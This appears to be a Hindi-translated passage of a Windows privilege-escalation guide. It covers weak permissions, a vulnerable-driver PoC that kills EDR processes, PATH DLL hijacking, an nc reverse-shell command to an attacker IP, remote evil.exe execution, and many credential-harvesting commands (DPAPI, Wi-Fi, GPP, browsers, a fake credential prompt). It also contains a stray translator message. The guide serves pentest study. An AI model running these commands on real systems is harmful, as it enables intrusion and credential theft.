accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*

icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Notepad++ plugin autoload persistence/execution

Notepad++ अपने plugins subfolders के तहत किसी भी plugin DLL को autoload करता है. अगर एक writable portable/copy install मौजूद है, तो एक malicious plugin रखने से हर लॉन्च पर notepad++.exe के अंदर automatic code execution मिल जाती है (इसमें DllMain और plugin callbacks भी शामिल हैं).

Notepad Plus Plus Plugin Autoload Persistence

स्टार्टअप पर रन

चेक करें कि क्या आप किसी ऐसे registry या binary को overwrite कर सकते हैं जो किसी दूसरे user द्वारा execute किया जाएगा.
निम्नलिखित पेज पढ़ें ताकि आप रोचक autoruns locations to escalate privileges के बारे में और जान सकें:

Privilege Escalation with Autoruns

Drivers

संभावित third party weird/vulnerable drivers की तलाश करें

driverquery
driverquery.exe /fo table
driverquery /SI

यदि कोई driver arbitrary kernel read/write primitive एक्सपोज़ करता है (अक्सर poorly designed IOCTL handlers में होता है), तो आप kernel memory से सीधे SYSTEM token चुरा कर privilege escalate कर सकते हैं। चरण-दर-चरण तकनीक यहाँ देखें:

Arbitrary Kernel Rw Token Theft

उन race-condition बग्स के लिए जहाँ vulnerable call एक attacker-controlled Object Manager path खोलता है, lookup को जानबूझकर धीमा करना (max-length components या deep directory chains का उपयोग करके) lookup window को microseconds से tens of microseconds तक बढ़ा सकता है:

Kernel Race Condition Object Manager Slowdown

Registry hive memory corruption primitives

Modern hive vulnerabilities आपको deterministic layouts को groom करने, writable HKLM/HKU descendants का दुरुपयोग करने, और metadata corruption को kernel paged-pool overflows में बदलने की अनुमति देती हैं, वो भी बिना किसी custom driver के। पूरी chain यहाँ पढ़ें:

Windows Registry Hive Exploitation

Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)

कुछ signed third‑party drivers अपने device object को IoCreateDeviceSecure के माध्यम से एक strong SDDL के साथ बनाते हैं लेकिन DeviceCharacteristics में FILE_DEVICE_SECURE_OPEN सेट करना भूल जाते हैं। इस flag के बिना, secure DACL उस समय लागू नहीं होती जब device को extra component वाला path के जरिए खोला जाता है, जिससे कोई भी unprivileged user निम्नलिखित namespace path का उपयोग करके handle प्राप्त कर सकता है:

• \ .\DeviceName\anything
• \ .\amsdk\anyfile (from a real-world case)

एक बार user device को खोल सके, driver द्वारा एक्सपोज़ किए गए privileged IOCTLs का दुरुपयोग LPE और tampering के लिए किया जा सकता है। वाइल्ड में देखी गई उदाहरण क्षमताएँ:

• Arbitrary processes को full-access handles लौटाना (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
• Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
• Arbitrary processes को terminate करना, जिसमें Protected Process/Light (PP/PPL) भी शामिल हैं, जिससे user land से kernel के माध्यम से AV/EDR kill संभव हो जाता है.

Minimal PoC pattern (user mode):

// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS  0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS,  &me,     sizeof(me),     0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);

Mitigations for developers

• जब उन device objects को बनाते हैं जिन्हें DACL द्वारा प्रतिबंधित किया जाना है, तो हमेशा FILE_DEVICE_SECURE_OPEN सेट करें।
• प्रिविलेज्ड ऑपरेशन्स के लिए caller context को वैलिडेट करें। प्रक्रिया termination या handle returns की अनुमति देने से पहले PP/PPL चेक जोड़ें।
• IOCTLs को सीमित रखें (access masks, METHOD_*, input validation) और सीधे kernel privileges के बजाय brokered models पर विचार करें।

Detection ideas for defenders

• संदिग्ध device नामों (उदा., \ .\amsdk*) के user-mode opens और दुरुपयोग को संकेत करने वाली विशिष्ट IOCTL sequences की निगरानी करें।
• Microsoft की vulnerable driver blocklist (HVCI/WDAC/Smart App Control) लागू करें और अपनी allow/deny सूचियाँ बनाएँ व बनाए रखें।

PATH DLL Hijacking

यदि आपके पास PATH में मौजूद किसी फ़ोल्डर के अंदर लिखने की अनुमतियाँ हैं तो आप किसी प्रक्रिया द्वारा लोड की गई DLL को hijack करके escalate privileges कर सकते हैं।

PATH के अंदर मौजूद सभी फ़ोल्डरों की अनुमतियाँ जांचें:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

इस चेक का दुरुपयोग कैसे करें, इसके बारे में अधिक जानकारी के लिए:

Writable Sys Path +Dll Hijacking Privesc

नेटवर्क

शेयर

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

hosts file पर hardcoded अन्य ज्ञात कंप्यूटरों की जाँच करें

type C:\Windows\System32\drivers\etc\hosts

नेटवर्क इंटरफेस और DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

खुले पोर्ट

बाहर से प्रतिबंधित सेवाएँ की जाँच करें

netstat -ano #Opened ports?

रूटिंग टेबल

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP Table

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

फ़ायरवॉल नियम

Check this page for Firewall related commands (नियम सूचीबद्ध करना, नियम बनाना, बंद करना, बंद करना…)

अधिक commands for network enumeration here

Windows Subsystem for Linux (wsl)

C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe

बाइनरी bash.exe को इस पाथ में भी पाया जा सकता है: C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

यदि आप root user प्राप्त कर लेते हैं, तो आप किसी भी port पर listen कर सकते हैं (जब आप पहली बार किसी port पर listen करने के लिए nc.exe का उपयोग करेंगे, तो यह GUI के माध्यम से पूछेगा कि क्या nc को firewall द्वारा allow किया जाना चाहिए)।

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

आसानी से bash को root के रूप में शुरू करने के लिए, आप --default-user root आज़मा सकते हैं

आप फ़ोल्डर C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\ में WSL filesystem एक्सप्लोर कर सकते हैं

Windows Credentials

Winlogon Credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

क्रेडेंशियल मैनेजर / Windows वॉल्ट

From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault\
Windows Vault उन सर्वरों, वेबसाइटों और अन्य प्रोग्रामों के लिए उपयोगकर्ता क्रेडेंशियल्स संग्रहीत करता है जिन्हें Windows उपयोगकर्ताओं को स्वचालित रूप से लॉग इन करवा सकता है। पहली नज़र में यह ऐसा लग सकता है कि उपयोगकर्ता अपने Facebook, Twitter, Gmail आदि के क्रेडेंशियल्स यहाँ स्टोर कर सकते हैं ताकि वे ब्राउज़र के माध्यम से स्वतः लॉग इन हो जाएँ। पर ऐसा नहीं है।

Windows Vault उन क्रेडेंशियल्स को स्टोर करता है जिनसे Windows उपयोगकर्ताओं को स्वचालित रूप से लॉग इन करा सकता है, जिसका मतलब यह है कि कोई भी Windows application that needs credentials to access a resource (server या website) can make use of this Credential Manager और Windows Vault का उपयोग करके दिए गए क्रेडेंशियल्स का उपयोग कर सकता है, ताकि उपयोगकर्ता बार-बार username और password न दर्ज करें।

जब तक एप्लिकेशन Credential Manager के साथ इंटरैक्ट नहीं करते, मुझे नहीं लगता कि वे किसी दिए गए रिसोर्स के लिए क्रेडेंशियल्स का उपयोग कर पाएँगे। इसलिए, यदि आपका एप्लिकेशन vault का उपयोग करना चाहता है, तो उसे किसी न किसी तरह से Credential Manager के साथ संवाद करके उस रिसोर्स के लिए क्रेडेंशियल्स का अनुरोध करना चाहिए और उन्हें default storage vault से प्राप्त करना चाहिए।

मशीन पर संग्रहीत क्रेडेंशियल्स की सूची दिखाने के लिए cmdkey का उपयोग करें।

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

इसके बाद आप saved credentials का उपयोग करने के लिए runas को /savecred विकल्प के साथ चला सकते हैं। निम्न उदाहरण SMB share के माध्यम से एक remote binary को कॉल कर रहा है।

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

प्रदान किए गए credential सेट के साथ runas का उपयोग करना।

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

ध्यान दें कि mimikatz, lazagne, credentialfileview, VaultPasswordView, या Empire Powershells module।

DPAPI

The Data Protection API (DPAPI) डेटा के सिमेट्रिक एन्क्रिप्शन के लिए एक तरीका प्रदान करता है, जो मुख्यतः Windows ऑपरेटिंग सिस्टम में असिमेट्रिक प्राइवेट कीज़ के सिमेट्रिक एन्क्रिप्शन के लिए उपयोग किया जाता है। यह एन्क्रिप्शन entropy में उल्लेखनीय योगदान देने के लिए user या system secret का उपयोग करता है।

DPAPI उपयोगकर्ता के login secrets से व्युत्पन्न सिमेट्रिक की के माध्यम से कीज़ को एन्क्रिप्ट करने में सक्षम बनाता है। system encryption के परिदृश्यों में, यह सिस्टम के domain authentication secrets का उपयोग करता है।

DPAPI का उपयोग करके एन्क्रिप्टेड user RSA keys %APPDATA%\Microsoft\Protect\{SID} डायरेक्टरी में स्टोर होती हैं, जहाँ {SID} उपयोगकर्ता के Security Identifier को दर्शाता है। DPAPI key, जो उसी फ़ाइल में user’s private keys की सुरक्षा करने वाले master key के साथ सह-स्थित होती है, आम तौर पर 64 bytes के random data से बनी होती है। (यह ध्यान देने योग्य है कि इस डायरेक्टरी का access restricted है, इसलिए इसकी contents को CMD में dir कमांड से सूचीबद्ध नहीं किया जा सकता, हालांकि इसे PowerShell के जरिए सूचीबद्ध किया जा सकता है)।

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

आप उपयुक्त arguments (/pvk या /rpc) के साथ mimikatz module dpapi::masterkey का उपयोग करके इसे डिक्रिप्ट कर सकते हैं।

ये credentials files protected by the master password आमतौर पर निम्न स्थानों पर पाए जाते हैं:

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

आप उपयुक्त /masterkey के साथ mimikatz module dpapi::cred का उपयोग करके decrypt कर सकते हैं.
आप extract many DPAPI masterkeys from memory को sekurlsa::dpapi module के साथ निकाल सकते हैं (यदि आप root हैं)。

DPAPI - Extracting Passwords

PowerShell क्रेडेंशियल्स

PowerShell credentials अक्सर scripting और automation tasks में encrypted credentials को सुविधाजनक रूप से store करने के लिए उपयोग किए जाते हैं। ये credentials DPAPI का उपयोग करके सुरक्षित किए जाते हैं, जिसका सामान्यतः मतलब यह है कि इन्हें केवल उसी user द्वारा उसी computer पर decrypt किया जा सकता है जिस पर इन्हें बनाया गया था।

जिस फ़ाइल में PS credentials मौजूद हैं, वहाँ से इन्हें decrypt करने के लिए आप यह कर सकते हैं:

PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username

john

PS C:\htb> $credential.GetNetworkCredential().password

JustAPWD!

Wifi

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*

सहेजे गए RDP कनेक्शन

आप इन्हें HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\\ पर पा सकते हैं:
और HKCU\Software\Microsoft\Terminal Server Client\Servers\ में

हाल ही में चलाए गए कमांड

HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Remote Desktop क्रेडेंशियल मैनेजर

%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

Use the Mimikatz dpapi::rdg module with appropriate /masterkey to decrypt any .rdg files
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module

Sticky Notes

लोग अक्सर Windows workstations पर StickyNotes app का उपयोग save passwords और अन्य जानकारी रखने के लिए करते हैं, यह न समझते हुए कि यह एक database file है। यह फ़ाइल C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite पर स्थित होती है और इसे ढूँढकर जाँचना हमेशा उपयोगी होता है।

AppCmd.exe

ध्यान दें कि AppCmd.exe से passwords को recover करने के लिए आपको Administrator होना चाहिए और High Integrity level पर चलना होगा।
AppCmd.exe %systemroot%\system32\inetsrv\ directory में स्थित है।
यदि यह फ़ाइल मौजूद है तो संभव है कि कुछ credentials configure किए गए हों और उन्हें recovered किया जा सके।

This code was extracted from PowerUP:

function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"

# Check if appcmd.exe exists
if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable

# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")

# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {

# Get application pool name
$PoolName = $_

# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd

# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd

# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}

# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {

# Get Virtual Directory Name
$VdirName = $_

# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd

# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd

# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}

# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}

SCClient / SCCM

जाँच करें कि C:\Windows\CCM\SCClient.exe मौजूद है .\
इंस्टॉलर्स SYSTEM privileges के साथ चलाए जाते हैं, कई DLL Sideloading (Info from https://github.com/enjoiz/Privesc**) के प्रति प्रवण होते हैं।

$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }

फ़ाइलें और Registry (Credentials)

Putty Creds

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

Putty SSH Host Keys

reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

रजिस्ट्री में SSH keys

SSH private keys रजिस्ट्री key HKCU\Software\OpenSSH\Agent\Keys के अंदर संग्रहीत हो सकते हैं, इसलिए आपको यह जाँचना चाहिए कि वहाँ कुछ रोचक तो नहीं है:

reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'

यदि आपको उस path के अंदर कोई एंट्री मिलती है तो वह शायद एक saved SSH key होगी। यह encrypted रूप में stored रहती है लेकिन इसे आसानी से decrypt किया जा सकता है используя https://github.com/ropnop/windows_sshagent_extract.
इस technique के बारे में अधिक जानकारी यहाँ: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

यदि ssh-agent service रन नहीं कर रही है और आप चाहते हैं कि यह boot पर अपने आप start हो, तो चलाएँ:

Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

Tip

ऐसा लगता है कि यह तरीका अब मान्य नहीं है। मैंने कुछ ssh keys बनाने, उन्हें ssh-add से जोड़ने और ssh के माध्यम से किसी मशीन में लॉगिन करने की कोशिश की। रजिस्ट्री HKCU\Software\OpenSSH\Agent\Keys मौजूद नहीं है और procmon ने असममित कुंजी प्रमाणीकरण के दौरान dpapi.dll के उपयोग की पहचान नहीं की।

बिना निगरानी वाली फ़ाइलें

C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

आप इन फ़ाइलों की खोज metasploit का उपयोग करके भी कर सकते हैं: post/windows/gather/enum_unattend

उदाहरण सामग्री:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>

<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>

SAM & SYSTEM बैकअप्स

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Cloud Credentials

#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

McAfee SiteList.xml

एक फ़ाइल जिसका नाम SiteList.xml है खोजें

Cached GPP Pasword

एक सुविधा पहले उपलब्ध थी जो Group Policy Preferences (GPP) के जरिए मशीनों के एक समूह पर कस्टम लोकल administrator accounts तैनात करने की अनुमति देती थी। हालांकि, इस विधि में गंभीर सुरक्षा कमजोरियाँ थीं। सबसे पहले, Group Policy Objects (GPOs), जो SYSVOL में XML फ़ाइलों के रूप में स्टोर होते थे, किसी भी domain user द्वारा एक्सेस किए जा सकते थे। दूसरे, इन GPPs में मौजूद पासवर्ड, जो AES256 से encrypt किए गए थे और एक publicly documented default key का उपयोग करते थे, किसी भी authenticated user द्वारा decrypt किए जा सकते थे। इससे गंभीर जोखिम पैदा होता था, क्योंकि यह उपयोगकर्ताओं को elevated privileges हासिल करने की अनुमति दे सकता था।

इस जोखिम को कम करने के लिए एक फ़ंक्शन विकसित किया गया जो locally cached GPP फ़ाइलों को scan करता है जिनमें एक “cpassword” field मौजूद हो और जो खाली न हो। ऐसी फ़ाइल मिलने पर, यह फ़ंक्शन password को decrypt करता है और एक custom PowerShell object लौटाता है। यह object GPP और फ़ाइल के स्थान के बारे में विवरण शामिल करता है, जिससे इस सुरक्षा कमजोरी की पहचान और remediation में मदद मिलती है।

Search in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (previous to W Vista) for these files:

• Groups.xml
• Services.xml
• Scheduledtasks.xml
• DataSources.xml
• Printers.xml
• Drives.xml

cPassword को डिक्रिप्ट करने के लिए:

#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

पासवर्ड पाने के लिए crackmapexec का उपयोग:

crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin

IIS वेब कॉन्फ़िग

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

web.config में credentials का उदाहरण:

<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>

OpenVPN क्रेडेंशियल्स

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]

$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)

Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}

लॉग्स

# IIS
C:\inetpub\logs\LogFiles\*

#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

credentials के लिए पूछें

यदि आप सोचते हैं कि वह उन्हें जान सकता है तो आप हमेशा उपयोगकर्ता से उसके credentials या यहाँ तक कि किसी अन्य उपयोगकर्ता के credentials भी दर्ज करने के लिए कह सकते हैं (ध्यान रखें कि क्लाइंट से सीधे credentials माँगना वास्तव में खतरनाक है):

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password

#Get plaintext
$cred.GetNetworkCredential() | fl

संभावित फ़ाइल नाम जिनमें credentials हो सकते हैं

जानी-पहचानी फ़ाइलें जिनमें कुछ समय पहले passwords clear-text या Base64 में पाए गए थे

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db         #Firefox
key4.db         #Firefox
places.sqlite   #Firefox
"Login Data"    #Chrome
Cookies         #Chrome
Bookmarks       #Chrome
History         #Chrome
TypedURLsTime   #IE
TypedURLs       #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

मुझे src/windows-hardening/windows-local-privilege-escalation/README.md की सामग्री यहाँ नहीं मिली। कृपया उस फाइल की सामग्री पेस्ट करें (या एक्सेस देने का तरीका बताएं), तब मैं उसे हिंदी में अनुवाद कर दूँगा।

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

RecycleBin में Credentials

आपको Bin को भी जांचना चाहिए कि उसके अंदर credentials हैं या नहीं

कई प्रोग्रामों द्वारा सेव किए गए passwords पुनर्प्राप्त करने के लिए आप उपयोग कर सकते हैं: http://www.nirsoft.net/password_recovery_tools.html

Registry के अंदर

अन्य संभावित registry keys जिनमें credentials हो सकते हैं

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"

Extract openssh keys from registry.

ब्राउज़र इतिहास

आपको उन dbs की जाँच करनी चाहिए जहाँ Chrome or Firefox के passwords स्टोर होते हैं.
ब्राउज़रों के history, bookmarks और favourites भी चेक करें — हो सकता है कुछ passwords are वहाँ स्टोर हों।

ब्राउज़र से passwords निकालने के टूल:

• Mimikatz: dpapi::chrome
• SharpWeb
• SharpChromium
• SharpDPAPI

COM DLL Overwriting

